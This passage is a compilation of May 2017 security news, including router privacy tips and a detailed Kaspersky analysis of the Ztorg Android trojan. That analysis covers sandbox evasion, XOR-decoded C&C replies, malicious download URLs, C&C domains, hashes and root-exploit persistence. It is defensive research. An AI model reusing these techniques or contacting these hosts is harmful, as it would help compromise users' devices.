"Technical data about the functioning and use of our routers and their WiFi network can help us to more quickly isolate and debug general technical issues, improve router features and functionality, and improve the performance and usability of our routers," Netgear said on its website.
How to Disable your Router Analytics Data Collection Feature
But if you are privacy conscious and don't want Netgear to collect details on you, you can disable this feature.
The company has provided an option in the router's configuration panel to turn the router analytics data collection feature off. Follow the instructions:
Launch a web browser from your PC or smartphone that is connected to the network.
Open the router login window by entering http://www.routerlogin.net.
Type the router username and password. If you haven't changed the default settings, your username is admin, and password is password.
Select Advanced → Administration → Router Update on the Home page.
Scroll down to the Router Analytics Data Collection section and select the Disable button to disable router analytics data collections.
Click the Apply button to save your settings.
That's it. You're done.
Boost And Secure Your Routers With DD-WRT

Alternatively, you can replace your device firmware with DD-WRT – a Linux-based open source firmware that is designed to enhance security and performance of wireless Internet routers.
Security conscious people always prefer DD-WRT firmware over their factory default firmware, which is compatible with many router models from popular manufacturers such as LinkSys, Cisco, Netgear, Asus, TP-Link, D-Link and more.
DD-WRT has a ton of features – it improves your wireless signal, as well as unlocks your router's potential to manage network traffic, static routing, VPN, repeating functions and more.
To check if your router is compatible with DD-WRT, head on to 'DD-WRT database' and search for your router model number.

If it's there and supported, then download it and follow below-mentioned general steps to install it:
Log into your router's admin page (usually at http://192.168.1.1/).
Go to the Admin section and choose "Firmware Upgrade."
Choose "Select File" and find your DD-WRT firmware.
Upload it and do not unplug or do anything to the router until it finishes updating.
Note: Changing your router's firmware with a non-compatible firmware can brick your router. So be very careful.

Experts discovered that the Terror Exploit Kit now includes fingerprinting capabilities
22.5.2017 securityaffairs Exploit

Experts from Talos Team discovered changes made to the Terror exploit kit (EK) that allow it to fingerprint victims and target specific vulnerabilities.
Recent changes made to the Terror exploit kit (EK) allow it to fingerprint victims and target specific vulnerabilities instead of carpet bombing the victims with many exploits at the same time, Talos researchers discovered.

Last week I reported the news of the improvements of the Stegano Exploit kit, today we will speak about the Terror exploit kit that now includes fingerprinting capabilities.

The Terror Exploit Kit first appeared in the threat landscape in January 2017, in April experts observed a significant increase of hacking campaigns leveraging the EK.

Because of similarities with Sundown EK, experts at MalwareBytes initially thought that the Terror EK was simply a new variant of Sundown, but further investigation revealed that it was actually from a different actor (so-called Terror EK by Trustwave).

The Terror EK was advertised on various underground forums by a hacker with the online moniker @666_KingCobra that is offering it for sale under different names (i.e. Blaze, Neptune, and Eris).

Experts at Malwarebytes Labs said that the Terror EK was used in a malvertising campaign distributing the Smoke Loader by exploiting Internet Explorer, Flash, and Silverlight exploits.

The Terror EK was also involved in a campaign using a different landing page that distributes the Andromeda malware.

The compromised websites were used to redirect to the exploit kit landing page via server 302 redirect call and done via script injection.

The powerful exploit kit was observed carpet bombing victims using many exploits at the same time, but now experts from Talos group observed a significant change in their tactic. News of the day is that the Terror Exploit Kit was improved with new exploits and implemented fingerprinting abilities. These latter features allow the EK to determine what exploit would be used in order to compromise the target system.

The new variant of the Terror Exploit Kit was able to determine the specific OS running on the victim’s PC, the browser version, installed security patches and plugins.

The researchers were served different files when accessing the site via different browsers, such as Internet Explorer 11 or Internet Explorer 8.

Talos malware researchers identified a potentially compromised legitimate website that operates as a malware gate. The website was initially used to redirect visitors to a RIG landing page, after a single day of analysis the gate switched to Terror exploit kit.

“Terror seems to constantly evolving. In this campaign it has added further exploits and no longer carpet bombs the victim. Instead it evaluates data regarding the victim’s environment and then picks potentially successful exploits depending on the victim’s operating system, patch level, browser version and installed plugins. This makes it harder for an investigator to fully uncover which exploits they have.” reads the analysis published by Talos.
“It is interesting to note that the adversaries are using an URL parameter in cleartext for the vulnerability they are going to exploit, e.g. cve2013-2551 = cve20132551 in the URL.”

The compromised website discovered by Talos experts redirects users to the EK landing page by using an HTTP 302 Moved Temporarily response, like previous campaigns.

Terror Exploit Kit

The page uses obfuscated Javascript code to determine the victim’s browser environment, then uses the return value of this function to submit a hidden form called ‘frm’.

“As mentioned in the executive overview, it uses some obfuscated Javascript code to evaluate the victim’s browser environment, for example it tries to get version information about the following plugins: ActiveX, Flash, PDF reader, Java, Silverlight, QuickTime, etc. Then it uses the return value of this function to submit the hidden form called ‘frm’.” continues the analysis.

The EK also uses cookie-based authentication for downloading the exploits, which prevents third-parties from accessing them, the security researchers discovered. This approach prevents not only investigators from learning where from or how the victims were infected, but also stops competitors from stealing the exploits.

“We have seen that the exploit kit market is experiencing an ongoing change. Big players in this market disappear while new ones show up. The new players are fighting for customers by constantly improving their quality and techniques. They modify these techniques on an ongoing basis to improve their capability to bypass security tools. This clearly shows how important it is to make sure that all your systems are up to date,” concluded Talos.

Ztorg: money for infecting your smartphone
22.5.2017 Kaspersky Mobil

This research started when we discovered an infected Pokémon GO guide in Google Play. It was there for several weeks and was downloaded more than 500,000 times. We detected the malware as Trojan.AndroidOS.Ztorg.ad. After some searching, I found some other similar infected apps that were being distributed from the Google Play Store. The first of them, called Privacy Lock, was uploaded to Google Play on 15 December 2016. It was one of the most popular Ztorg modifications, with more than 1 million installations.

After I started tracking these infected apps, two things struck me – how rapidly they became popular and the comments in the user review sections.

Popularity

These infected apps quickly became very popular, gaining thousands of new users each day!

For example, com.fluent.led.compass had 10,000–50,000 installations the day I found and reported it to Google.

However, it still wasn’t deleted from Google Play the next day and the number of installations increased tenfold to 100,000–500,000. It means there were at least 50,000 new infected users in the space of just one day.

Comments

There were lots of comments saying that people downloaded these apps for credits/coins/etc.

In some of these comments the users mentioned other apps – Appcoins, Advertapp, etc.

That’s where this latest research work started.

Advertising

Apps that pay users

The app mentioned most in the comments was Appcoins, so I installed it. After that, the app prompted me to install some other apps, including one that was malicious, for $0.05.

To be honest, I was surprised that only one was malicious – all the other apps were clean.

The funny thing is that they check for root rights on the device and don’t pay those that have them. And the first thing that Ztorg did on the device after infection started was to get superuser rights.

I contacted the Appcoins developers to try and find out where this malicious advertising offer came from, but they deleted the offer and answered me by saying there was no malware and that they had done nothing wrong.

Then I analyzed the apps installed by infected users and made a list of the most popular ones that paid users to install software:

mobi.appcoins

https://play.google.com/store/apps/details?id=mobi.appcoins

com.smarter.superpocket

https://play.google.com/store/apps/details?id=com.smarter.superpocket

com.moneyreward.fun

https://play.google.com/store/apps/details?id=com.moneyreward.fun

And of course they offered malware too:

All these offered users 0.04-0.05 USD for installing an app infected with Ztorg from Google Play.

Campaigns

So I decided to take a closer look at these offers and the dumped traffic for these apps.

A typical session in which an advertising app turned into a malicious one was as follows:

App receives offers, including malicious ones, from its server (for example, moneyrewardfun[.]com). Malicious offers are sent from well-known ad services (usually supersonicads.com and aptrk.com).

After a few redirections from ad service domains (in one case there were 27 redirections) the app goes to global.ymtracking.com or avazutracking.net. These URLs are related to the ads too.

Then it redirects to track.iappzone.net.

And the final URL that leads to the Google Play Store was app.adjust.com.

All the offers that I was able to dump had track.iappzone.net and app.adjust.com.

adjust.com is a well-known “business intelligence platform”; the URLs that are used in malicious campaigns look like this:

https://app.adjust.com/4f1lza?redirect=https://play.google.com/store/apps/details?id=com.game.puzzle.green&install_callback=http://track.iappzone.net…

By analyzing these URLs we can identify infected apps on Google Play.

Malicious server

URLs from iappzone.net look like this:

http://track.iappzone.net/click/click?offer_id=3479&aff_id=3475&campaign=115523_201|1002009&install_callback=http://track.supersonicads.com/api/v1/processCommissionsCallback.php?advertiserId=85671&password=540bafdb&dynamicParameter=dp5601581629793224906

This URL structure (offer_id=..&aff_id=..&campaign=..) is related to the OffersLook tracking system. It contains many interesting things, like offer id, affiliate id. But it turns out that cybercriminals use different values for them, making these parameters unusable for us. Except one – install_callback. This parameter contains the name of the ad service.

While searching for iappzone.net I was able to find some APK files that contained this URL. All of those files are detected by Kaspersky Lab products as Ztorg malware. The interesting thing was that iappzone.net used the IP 52.74.22.232. The same IP was used by aedxdrcb.com, which was mentioned in CheckPoint’s gooligan report. A few weeks after that report was made public, iappzone.net (which wasn’t mentioned in the report) was moved to a new IP – 139.162.57.41.

Ad modules

Luckily I was able to find iappzone.net not only in the APK files but also in network traffic from clean apps. All these apps had an advertising module – Batmobi or Mobvista in most cases. Network traffic from these ad modules looked similar to the network traffic from the apps that paid users to install promoted apps.

Here is an example of an app with a Batmobi ad module. The module received a JSON file with offers from their server api2.batmobil.net.

The user sees a list of advertised apps:

After the user clicks on the ads, they are redirected to the Google Play Store.

In this case, the redirects look like this:

api2.batmobil.net -> global.ymtracking.com->tracking.acekoala.com -> click.apprevolve.com ->track.iappzone.net ->app.adjust.com -> play.google.com

After analyzing ad campaigns containing iappzone.net, I was able to find almost 100 infected apps being promoted on Google Play.

The other interesting aspect of these campaigns was that their URLs contained the install_callback parameter that I mentioned earlier. Turns out the cybercriminals only used four ad networks.

Ad sources

track.iappzone.net callbacks

Yeahmobi (global.ymtracking.com) 41%
Mobvista (next.mobvista.com) 34%
Avazu (postback.apx.avazutracking.net) 18%
Supersonicads (track.supersonicads.com) 7%
However, this doesn’t mean that malware was only being distributed through these four networks. These ad networks are selling their ads to a wide range of advertising companies. In my research, I saw some malicious ads coming from other advertising networks like DuAd or Batmobi, but after a few redirects these ads were always pointing to one of the four advertising networks listed above.

Furthermore, I tracked several malicious ad campaigns that looked like this:

Batmobi -> Yeahmobi-> SupersonicAds

which means that these networks also redistribute ads to each other.

I wasn’t able to find any other ad networks in the install_callback parameter until the end of March 2017.

Other sources

During my research I found some infected apps that were not promoted by these advertising networks. When I looked at their detection paths I found that there were several patterns to them. Most of the paths where these apps were detected (except the installation path /data/app) were as follows:

[sdcard]/.android/ceroa/play/
[sdcard]/.nativedroid/download/
[sdcard]/.sysAndroid/download/
[sdcard]/.googleplay_download/
[sdcard]/.walkfree/apks/583737491/
[sdcard]/Android/data/TF47HV2VFKD9/
[sdcard]/Android/Data/snowfoxcr/
[sdcard]/DownloadProvider/download/
I analyzed the apps using these paths and discovered that all of them are already detected by Kaspersky Lab products as adware or malware. However, the apps downloaded to these folders are not all malicious – most of them are clean.

Folder’s name Type Detection %*
DownloadProvider Malware 81%
TF47HV2VFKD9 Malware 56%
snowfoxcr AdWare 51%
nativedroid Malware 48%
.walkfree AdWare 33%
ceroa AdWare 20%
sysAndroid Malware 16%
.googleplay_download Malware 15%
* Malicious apps that were downloaded to a specific folder as a percentage of all apps in that folder.

Infected apps

Similar apps

All the infected apps that I analyzed surprised me in that they don’t look like they were patched with malware code. In many other cases, cybercriminals just add malicious code to clean apps, but not in this case. Looks like these apps were created especially for distributing malware.

Publishers from Google Play

Some of the publishers’ emails from Google Play:

com.equalizer.goods.listener trantienfariwuay@gmail.com
com.ele.wall.papers nguyenduongsizang@gmail.com
com.game.free.plus.prefect liemproduction08@gmail.com
com.green.compass.star longhahoanghuong@gmail.com
com.voice.equalizer.musicssss baoanstudio@gmail.com
com.amusing.notes.done trunggapin@gmail.com
com.booster.ram.app.master.clean lakonmesminh@gmail.com
com.game.puzzle.green zentinlong@gmail.com
com.listen.music.pedometer tramhuyenthoai9a@gmail.com
com.live.paper.watch.analog nguyenthokanuvuong@gmail.com
When I started to search for them, I found that most of the emails are related to Vietnam.

For example:

trantienfariwuay -> tran tien [fariwuay] – Vietnamese singer

liemproduction08 -> liem production [08] – Thuat Liem Production, company from Ho Chi Minh City, Vietnam

nguyenthokanuvuong -> nguyen [thokanu] vuong – Vietnamese version of Chinese name Wang Yuan

Malicious modules

Almost all of the infected apps from Google Play contain the same functionality – to download and execute the main module. During this research, I found three types of modules with this functionality.

Dalvik

Every infected app from Google Play with this type of malicious module was protected by the packer. I will describe the app with the package name com.equalizer.goods.listener. It was packed using the Qihoo packer. This app has many different classes and only a few of them are related to the malicious module. Malicious code will be triggered by the PACKAGE_ADDED and PACKAGE_REMOVED system events. It means that malicious code only starts executing after the user installs/updates/removes an app.

As a first step, the malicious module will check if it’s running on a virtual machine, emulator or sandbox. To do so, it will check several dozen files that exist on different machines and several dozen values for different system properties. If this check is passed, the Trojan will start a new thread.

In this new thread the Trojan will wait a random amount of time, between an hour and an hour and a half. After waiting it will make a GET HTTP request to the C&C (em.kmnsof.com/only) and, as a result, the Trojan will receive a JSON file encrypted with DES. This JSON should contain a URL from which a file can be downloaded. The file is an ‘xorred’ JAR that contains the malicious classes.dex – the main module.

Native

Since October 2016 I’ve reported lots of apps with this malicious module to Google, so they were able to improve their detection system and catch almost all of them. This meant the cybercriminals had to bypass this detection. In the beginning they changed some methods in the code and used commercial packers. But in February 2017 they rewrote the entire code, moving all functionality to the ELF (native, .so) library.

Example: com.unit.conversion.use (MD5: 92B02BB80C1BC6A3CECC321478618D43)

The malicious code is triggered after app execution starts from the onCreate method.

The malicious code in the infected classes.dex is simple – it starts a new thread that loads the MyGame library and it has two methods for dealing with sandbox detections, which will be executed from the library.

In this version, the delays are much smaller than in the previous one – it waits only 82 seconds before execution.

After starting, the MyGame library will check if it’s running in a sandbox by executing the two methods from classes.dex. One will try to register the receiver for the BATTERY_CHANGED action and check if it’s correct. Another method will try to get application info about the com.android.vending package (Google Play Store) with the MATCH_UNINSTALLED_PACKAGES flag. If both of these methods return “false”, the malicious library will execute a GET request to the command server.

It receives: “BEgHSARIB0oESg4SEhZcSUkCCRFICAUSHwoLEhZIBQkLSQ4fSQ4fVlZVSQEWVlZVSAcWDUpeVg==”

The library will decode this answer and xor it with a 0x66 key.

Result:

b.a.b.a,b,http://dow.nctylmtp.com/hy/hy003/gp003.apk,80

g_class_name = b.a.b.a

g_method_name = b

g_url = http://dow.nctylmtp.com/hy/hy003/gp003.apk

g_key = 80

The .apk file available at g_url will be downloaded into the cache folder of the app folder (/data/data/<package_name>/cache). The library will xor it with g_key and load it using a ClassLoad method from the DexClassLoader class.

As we can see, the cybercriminals changed a lot in the malicious code, and replaced the Java code with C code. But the functionality remains the same – connect to the C&C, download and execute the main module.

Detection bypassing

Once I was able to receive the package IDs from these campaigns, I installed the infected app from Google Play on my test device and… nothing happened. After some investigating, I found that the cybercriminals only return a malicious payload to users that install apps via ads. However, some of the other infected apps started to infect my test phone when installed directly from Google Play – without clicking on any ads.

Dropper

In April 2017 the cybercriminals changed their Ztorg code again. In this third type of malicious module, the cybercriminals moved all the functionality back to classes.dex. The main difference with the previous version is that it’s no longer a Trojan-Downloader. It doesn’t download the main module from a malicious server; instead it contains an encrypted module in the Assets folder of the installation package. The file called info.data is xored with 0x12 and then loaded using the ClassLoad method.

Payload (main module)

In all the attacks that I analyzed the main module had the same functionality. I’ll describe one of the most recent – 2dac26e83b8be84b4a453664f68173dd. It was downloaded by the com.unit.conversion.use app using the malicious MyGame library.

This module is downloaded by the infection module and loaded using the ClassLoad method. The main purpose of the module is to gain root rights and install other modules. It does this by downloading or dropping some files.

Some files can only be dropped from this module; there are no URLs for them.

Some of the URLs with the down.118pai.com domain didn’t work at the time of this research. All files that have these URLs can be dropped. All files that have URLs only and cannot be dropped have URLs with the domains sololauncher.mobi and freeplayweb.com, which were accessible at the time of this research.

In one of the previous versions of the main module, dated September 2016, all the URLs had the down.118pai.com domain and were available at that time.

Some of the dropped/downloaded malicious files will be added to the /system/etc/install-recovery.sh file. It means that these files will remain on the device even after a reset to factory settings.

All files that are dropped and downloaded by this module can be divided into a few groups:

Clean files, tools

File name Tool name MD5
data/files/.zog/.a chattr 9CAE8D66BE1103D737676DBE713B4E52
data/files/.zog/.a chattr 1E42373FA7B9339C6C0A2472665BF9D4
data/files/.zog/supolicy supolicy cdceafedf1b3c1d106567d9ff969327a
data/files/.zog/busybox busybox 3bc5b9386c192d77658d08fe7b8e704f
data/files/.zog/.j Patched su 8fb60d98bef73726d4794c2fc28cd900
Exploits, exploit packs, exploit droppers

File Name Name MD5 Detection name
data/files/.Ag/Agcr Agcr32 D484A52CFB0416CE5294BF1AC9346B96 Exploit.AndroidOS.Lotoor.bv
data/files/.Ag/Agcr Agcr64 B111DD21FD4FCEFDC8268327801E55CE Exploit.AndroidOS.Lotoor.bv
data/files/.zog/.ag/bx Bx 70EBFA94C958E6E6A7C6B8CD61B71054 Exploit.AndroidOS.Lotoor.bu
data/files/.zog/.ag/cx cx 892E033DA182C06794F2B295377B8A65 Exploit.AndroidOS.Lotoor.bu
data/files/.zog/exp exp 6E17234C57308012911C077A376538DC Exploit.AndroidOS.Lotoor.bz
data/files/.zog/.ag/nn.zip maink.apk/boy ab9202ccfdd31e685475ba895d1af351 script
data/files/.zog/.ag/nn.zip maink.apk/bx 70ebfa94c958e6e6a7c6b8cd61b71054 Exploit.AndroidOS.Lotoor.bu
data/files/.zog/.ag/ym ym32 F973BAA67B170AB52C4DF54623ECF8B3 Exploit.AndroidOS.Lotoor.bu
data/files/.zog/.ag/ym ym64 807A6CF3857012E41858A5EA8FBA1BEF Exploit.AndroidOS.Lotoor.bu
data/files/.zog/.aa mainp.apk/r1 c27e59f0f943cf7cc2020bda7efb442a Exploit.AndroidOS.Lotoor.bh
data/files/.zog/.aa mainp.apk/r2 368df668d4b62bdbb73218dd1f470828 Exploit.AndroidOS.Lotoor.bi
data/files/.zog/.aa mainp.apk/r3 fb8449d1142a796ab1c8c1b85c7f6569 Exploit.AndroidOS.Lotoor.bh
data/files/.zog/.aa mainp.apk/r4 04dd488783dffcfd0fa9bbac00dbf0f9 Exploit.Linux.Enoket.a
data/files/.zog/.ad mainmtk.apk b4b805dc90fa06c9c7e7cce3ab6cd252 Exploit.AndroidOS.Lotoor.bi
data/files/.zog/.ag/np np 1740ae0dc078ff44d9f229dccbd9bf61 Exploit.Linux.Enoket.a
Most of these files will be downloaded by the Trojan, but some of them can only be dropped from the Trojan body. However, most of the downloaded files are the same as they were seven months ago in September 2016.

Native (ELF) malicious modules

File Name MD5 Path after infection Detection name
data/files/.zog/.am b30c193f98e83b7e6f086bba1e17a9ea /system/xbin/.gasys Backdoor.AndroidOS.Ztorg.j
data/files/.zog/.an 41ab20131f53cbb6a0fb69a143f8bc66 /system/lib/libgstdsys.so Backdoor.AndroidOS.Ztorg.j
data/files/.zog/.b ae822aed22666318c4e01c8bd88ca686 /system/xbin/.gap.a Backdoor.AndroidOS.Ztorg.c
data/files/.zog/.k 5289027ca9d4a4ed4663db445d8fc450 /system/bin/debuggerd Backdoor.AndroidOS.Ztorg.c
data/files/.zog/.m 5af47875666c9207110c17bc8627ce30 /system/bin/ddexe script
data/files/.zog/.c d335ac148f6414f0ce9c30ac63c20482 /system/xbin/.gap Backdoor.AndroidOS.Ztorg.c
All of these files can only be dropped from the Trojan’s body. They are not downloaded.

Malicious apps

File Name Name MD5 Path after infection Detection name
data/files/.zog/.l mains.apk 87030ae799e72994287c5b37f6675667 /system/priv-app/dpl.apk Trojan-Dropper.AndroidOS.Agent.cv
data/files/.zog/.o mains2.apk 93016a4a82205910df6d5f629a4466e9 /system/priv-app/.gmq.apk Trojan.AndroidOS.Boogr.gsh
data/files/.zog/.n mainm.apk 6aad1baf679b42adb55962cdb55fb28c /system/priv-app/.gma.apk Backdoor.AndroidOS.Ztorg.a
data/files/.zog/.al .al 7d7247b4a2a0e73aaf8cc1b5c6c08221 /system/priv-app/.gmtgp.apk Trojan.AndroidOS.Hiddad.c
.gmtgp.apk (7d7247b4a2a0e73aaf8cc1b5c6c08221)

This app is detected as Trojan.AndroidOS.Hiddad.c. It downloads (from the C&C http://api.ddongfg.com/pilot/api/) an additional encrypted module, decrypts and loads it. In my case it downloads Trojan-Clicker.AndroidOS.Gopl.a (af9a75232c83e251dd6ef9cb32c7e2ca).

Its C&C is http://g.ieuik.com/pilot/api/; additional domains are g.uikal.com and api.ddongfg.com.

The Trojan uses accessibility services to install (or even buy) apps from the Google Play Store.

It also downloads apps into the .googleplay_download directory on the SD card and installs them using accessibility services to click buttons. The folder .googleplay_download is one of the sources used to spread the Ztorg Trojan. It can click buttons that use one of 13 languages – English, Spanish, Arabic, Hindi, Indonesian, French, Persian, Russian, Portuguese, Thai, Vietnamese, Turkish and Malay.

dpl.apk (87030AE799E72994287C5B37F6675667)

This module contains the same methods to detect emulators, sandbox and virtual machines as in the original infected module.

It downloads an encrypted file from the C&C api.jigoolng.com/only/gp0303/12.html into the file /.androidsgqmdata/isgqm.jar. After decryption, the Trojan loads this file.

The main purpose of dpl.apk is to download and install apps. It receives commands from the following C&Cs:

log.agoall.com/gkview/info/,
active.agoall.com/gnview/api/,
newuser.agoall.com/oversea_adjust_and_download_write_redis/api/download/,
api.agoall.com/only/
The module downloads them into the DownloadProvider directory on the SD card. This folder is one of the sources used to distribute the Ztorg Trojan.

In my case, it downloaded five malicious APKs; four of them were installed and listed in the Installed apps section.

.gma.apk (6AAD1BAF679B42ADB55962CDB55FB28C)

This Trojan tries to download the additional isgqm.jar module with the main functionality in the same way as the other modules. Unfortunately, its C&Cs (a.gqkao.com/igq/api/, d.oddkc.com/igq/api/, 52.74.240.149/igq/api, api.jigoolng.com/only/) didn’t return any commands, so I don’t know the main purpose of this app.

This app can modify /system/etc/install-recovery.sh, and download files to the /.androidgp/ folder on the SD card. These files will be installed in the system folders (/system/app/ or /system/priv-app/).

I assume this Trojan is needed to update other modules.

.gmq.apk (93016a4a82205910df6d5f629a4466e9)

This Trojan wasn’t able to download its additional module isgq.jar from the C&Cs (a.apaol.com/igq/api, c.oddkc.com/igq/api, 52.74.240.149/igq/api).

Installed apps

The following apps were silently downloaded and installed on the device after infection. All of them have some well-known ad services.

Package Name Detection Md5 Ad modules
co.uhi.tadsafa Trojan-Downloader.AndroidOS.Rootnik.g d1ffea3d2157ede4dcc029fb2e1c3607 mobvista, batmobi
com.friend.booster Trojan.AndroidOS.Ztorg.bo 5c99758c8622339bffddb83af39b8685 mobvista, batmobi
sq.bnq.gkq Trojan-Downloader.AndroidOS.Rootnik.g 10272af66ab81ec359125628839986ae mobvista, batmobi
main.ele.com.blood Trojan.AndroidOS.Ztorg.bo 8572aec28df317cd840d837e73b2554a mobvista
They also have malicious modules that start downloading ads and apps when commanded by their C&C.

But using clean advertising networks like Mobvista and Batmobi creates an ad recursion, because these ads were used to distribute the original infected app.

A few new folders appear on the SD card after a successful infection. Among them:

.googleplay_download
.nativedroid
.sysAndroid
DownloadProvider
All of these folders were used by some of the malware to spread the initial Ztorg infection and were used after infection to distribute other apps – some of them malicious.

Other Trojans

Despite the fact that almost every Trojan from Google Play found during this research had one of the three malicious modules described in this research, there were also a few other Trojans.

One of them, called Money Converter (com.countrys.converter.currency, 55366B684CE62AB7954C74269868CD91), had been installed more than 10,000 times from Google Play. Its purpose is similar to that of the .gmtgp.apk module – it uses Accessibility Services to install apps from Google Play. Therefore, the Trojan can silently install and run promoted apps without any interaction with the user, even on updated devices where it cannot gain root rights.

It used the same command and control servers as .gmtgp.apk.

Conclusion

During the research period I found that Trojan.AndroidOS.Ztorg was uploaded to Google Play Store almost 100 times as different apps. The first of them was called Privacy Lock, had more than 1 million installations and was uploaded in mid-December 2015. Every month after I started tracking this Trojan in September 2016 I was able to find and report at least three new infected apps on Google Play. The most recent apps that I found were uploaded in April 2017, but I’m sure there will be more soon.

All of these apps were popular. Furthermore, their popularity grew very fast, with tens of thousands of new users sometimes being infected each day.

I found out that these Trojans were actively distributed through advertising networks. All these malicious campaigns contained the same URL, which allows me to easily track down any new infected apps.

I was surprised that these Trojans were distributed through apps that were paying users for installing promoted apps. It turned out that some users got paid a few US cents for infecting their device, though they didn’t know it was being infected.

Another interesting thing about the distribution of this Trojan is that after infection it used some of the advertising networks to show infected users ads about installing promoted apps. It creates a kind of ad recursion on infected devices – they become infected because of a malicious ad from an advertising network and after infection they see ads from the same advertising network because of the Trojan and its modules.

Cybercriminals were able to publish infected apps on Google Play because of the numerous techniques they used to bypass detection. They continued to develop and use new features in their Trojans all the time. This Trojan has modular architecture and it uses several modules with different functionality and each of them can be updated via the Internet. During infection Ztorg uses several local root exploit packs to gain root rights on a device. Using these rights allows the Trojan to achieve persistence on the device and deliver ads more aggressively.

Terror Exploit Kit Gets Fingerprinting Capabilities

22.5.2017 securityweek Exploit
Recent changes made to the Terror exploit kit (EK) allow it to fingerprint victims and target specific vulnerabilities instead of carpet bombing the victims with many exploits at the same time, Talos researchers discovered.

Terror was initially detailed in January this year, when security researchers observed that it was targeting vulnerabilities with exploits taken from Metasploit or from either Sundown or Hunter EKs. Terror activity increased last month, after the Sundown EK inexplicably disappeared from the threat landscape.

Previously, the EK was observed carpet bombing victims with many exploits at the same time, even if those exploits didn’t match the targeted browser environment. Now, the threat has added more exploits and is fingerprinting victim’s system to determine what exploit would be successful based on operating system, patch level, browser version, and installed plugins.

The use of more targeted exploits makes it more difficult for investigators to determine which exploits the toolkit has. However, “it is interesting to note that the adversaries are using an URL parameter in cleartext for the vulnerability they are going to exploit,” Talos says.

Additionally, Talos researchers identified a potentially compromised legitimate web site that appears to be operating as a malware gate. Initially redirecting visitors to a RIG landing page, the gate switched to Terror after a single day.

The compromised website redirects users to the EK landing page by using a HTTP 302 Moved Temporarily response. The page uses obfuscated Javascript code to evaluate the victim's browser environment, then uses the return value of this function to submit a hidden form called ‘frm’.

More proof that the EK has moved away from its carpet bombing approach is the manner in which it selects exploits when attempting to infect the victim. The researchers were served different files when accessing the site via Internet Explorer 11 than when using Internet Explorer 8.

Stealth Backdoor Abused NSA Exploit Before WannaCrypt

22.5.2017 securityweek BigBrothers
In the aftermath the WannaCry ransomware outbreak, security researchers discovered numerous attacks that have been abusing the same EternalBlue exploit for malware delivery over the past several weeks.

Targeting a Server Message Block (SMB) vulnerability on TCP port 445, the exploit was made public in April by the group of hackers calling themselves “The Shadow Brokers” and is said to have been stolen from the National Security Agency-linked Equation Group. The targeted flaw was patched in March.

The fast spreading WannaCry brought EternalBlue to everyone’s attention, yet other malware families have been using it for infection long before the ransomware started using it. One of them was the Adylkuzz botnet, active since April 24, researchers revealed.

Now, Cyphort says that evidence on a honeypot server suggests attacks on SMB were active in early May, and they were dropping a stealth Remote Access Trojan (RAT) instead of ransomware. The malware didn’t have the worm component and didn’t spread like WannaCry.

The malware appears to have been distributed from an IP (182.18.23.38) located in China. Following successful exploitation, an encrypted payload is sent as a shellcode, and the security researchers found a DLL embedded in the shellcode, which they say “is basically a Trojan which downloads additional malware and receives commands from its controller.”

One of the files downloaded by this malware is meant to close port 445, thus preventing other malware from abusing the same flaw. Another file is believed to be a second-stage payload. The RAT sets a series of Registry Run entries to download and execute additional malware, the researchers say.

The malware attempts to delete a number of users and terminate and/or delete various files or processes and a memory dump reveals that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.

The RAT can receive and execute commands from server, monitor the screen, capture audio and video, monitor the keyboard, transfer data, delete files, terminate processes, execute files, enumerate files and processes, download files, and control the machine.

Because the threat closes port 445, Cyphort believes the actor was aware of the EternalBlue vulnerability and was attempting to keep other malware out of the vulnerable machines.

“We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. We found similarities in terms of their IOCs,” the security researchers say.

In a report this week, Secdo also claims to have found evidence of malware abusing EternalBlue weeks before WannaCry emerged. One of the malicious programs appears to be a ransomware family that also steals user credentials.

A “new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since the mid-April,” the researchers say. “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed.”

As part of this attack, the researchers say, actors were using an EternalBlue-based worm to infect all machines in a compromised network, and were also deploying a backdoor for persistence, or exfiltrated login credentials.

One of the attacks originated from a Russian IP (77.72.84.11). Using the NSA-linked exploit for compromise, attackers spawned a thread inside a legitimate application, and used it to download multiple modules, including SQLite DLL from SourceForge to steal login credentials from Firefox.

Stolen data is exfiltrated through the TOR network, after which “a ransomware variant of CRY128 that runs purely in-memory encrypts all the documents on the system,” the researchers say.

The recently discovered UIWIX ransomware that spreads via the EternalBlue exploit is also being executed only in memory, resulting in a fileless infection. UIWIX also contains code meant to steal a broad range of login credentials.

Another attack was linked to a Chinese actor and involved the distribution of a backdoor. The attack starts with process injection, similar to the above, but ends with the download of a known root-kit backdoor (based on Agony). The downloaded file, 666.exe, is blocked by antivirus programs.

“Based on these findings, we suspect that the scope of the damage is much greater than previously thought, and that there are at least 3 different groups that have been leveraging the NSA exploit to infect enterprise networks since late April,” Secdo notes.

In January, United States Computer Emergency Readiness Team (US-CERT) issued an alert after Shadow Brokers revealed they had a zero-day exploit targeting SMB up for sale. In February, a Windows’ SMBv3 0-day vulnerability (CVE-2017-0016) was assessed with a High severity rating, after initially believed to be Critical.

North Korea Denies Role in Global Cyberattack

22.5.2017 securityweek Cyber
North Korea on Friday angrily dismissed reports linking its isolated regime to the global cyberattack that held thousands of computers to virtual ransom.

Up to 300,000 computers in 150 countries were hit by the WannaCry worm, which seizes systems and demands payment in Bitcoin to return control to users.

The code used in the latest attack is similar to that used in past hacks blamed on Kim Jong-Un's regime, leading some to point the finger at Pyongyang.

But the North has now denied the claims, notably but not exclusively advanced by South Korean experts, and hit back Friday to accuse its opponents of spreading propaganda.

"It is ridiculous," Kim In-Ryong, North Korea's deputy ambassador to the United Nations, told reporters, suggesting Washington and Seoul were behind the allegation.

"Whenever something strange happens, it is the stereotyped way of the United States and the hostile forces to kick off a noisy anti-DPRK campaign."

Related: WannaCry Doesn't Fit North Korea's Style, Interests, Experts Say

Seoul internet security firm Hauri, known for its vast troves of data on Pyongyang's hacking activities, has been warning of ransomware attacks since last year.

The firm's Simon Choi told AFP that the WannaCry malware shares code with tools used to target Sony Pictures and Bangladesh, in previous attacks blamed on the North.

Researchers in the US, Russia and Israel have also pointed to a potential North Korean link -- but it is notoriously hard to attribute cyberattacks.

Google researcher Neel Mehta has shown similarities between WannaCry and code used by the Lazarus hacking group, widely believed to be connected to Pyongyang.

China Killed or Jailed Up to 20 US Spies in 2010-12: Report

22.5.2017 securityweek CyberSpy
Beijing systematically dismantled CIA spying efforts in China beginning in 2010, killing or jailing more than a dozen covert sources, in a deep setback to US intelligence there, The New York Times reported Sunday.

